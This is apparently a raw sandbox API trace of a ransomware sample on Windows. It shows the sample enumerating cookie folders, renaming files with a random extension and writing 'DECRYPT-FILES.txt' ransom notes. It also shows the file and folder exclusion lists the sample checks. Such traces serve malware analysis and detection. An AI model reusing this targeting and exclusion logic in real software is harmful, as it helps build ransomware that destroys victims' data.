[0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.007] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.007] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.007] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.007] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.007] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.007] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.008] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.008] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.008] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.008] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.008] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.008] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.008] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.008] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.008] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.008] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.008] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.008] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.008] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.008] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.008] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.008] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.008] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.008] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.008] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.008] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.009] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.009] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt") returned 105 [0079.009] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa") returned 112 [0079.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shwjma"), dwFlags=0x0) returned 1 [0079.010] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.010] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.010] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.011] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2548c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.011] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.011] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x91afbc90, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0079.011] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0079.011] lstrlenW (lpString="index.dat") returned 9 [0079.011] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0079.011] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0079.011] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0079.011] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0079.011] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0079.011] lstrlenW (lpString="index.dat") returned 9 [0079.011] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0079.011] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" [0079.011] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.012] CloseHandle (hObject=0x0) returned 0 [0079.012] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.012] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2548c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.012] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.012] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.012] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.012] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.012] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.012] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0079.012] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.012] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0079.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp" [0079.012] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.013] CloseHandle (hObject=0x0) returned 0 [0079.013] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.013] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52878dd0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0079.013] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0079.013] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0079.013] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0079.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Program Files") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch=":\\Windows") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Games\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\All Users") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.014] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="AhnLab") returned 0x0 [0079.014] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.014] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.014] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\jkbimi8.tmp") returned 88 [0079.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0079.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.016] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.017] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\DECRYPT-FILES.txt") returned 94 [0079.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0079.017] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0079.018] CloseHandle (hObject=0x45c) returned 1 [0079.018] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.018] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0079.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0079.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.019] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.020] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.020] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.020] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44eb6480, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44eb6480, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44eb6480, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", cAlternateFileName="5P9943~1.TXT")) returned 1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="autorun.inf") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="boot.ini") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="desktop.ini") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="ntuser.dat") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="iconcache.db") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="bootsect.bak") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="thumbs.db") returned -1 [0079.020] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="Bootfont.bin") returned -1 [0079.020] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt") returned 48 [0079.020] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.020] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.020] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.020] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.020] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt") returned 48 [0079.021] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.021] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" [0079.021] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 